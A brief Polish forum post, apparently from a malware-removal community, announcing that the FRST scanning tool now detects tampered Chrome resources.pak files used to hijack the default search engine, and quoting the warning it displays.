picasso Opublikowano 24 Czerwca 2017 Zgłoś Udostępnij Opublikowano 24 Czerwca 2017 Informacyjnie: udało mi się uzyskać w FRST detekcję modyfikacji resources.pak. W przypadku szkodliwej domyślnej wyszukiwarki pojawi się następujący komunikat: CHR res: Infected resources.pak (search_engine). Reinstall Chrome. Odnośnik do komentarza
Rekomendowane odpowiedzi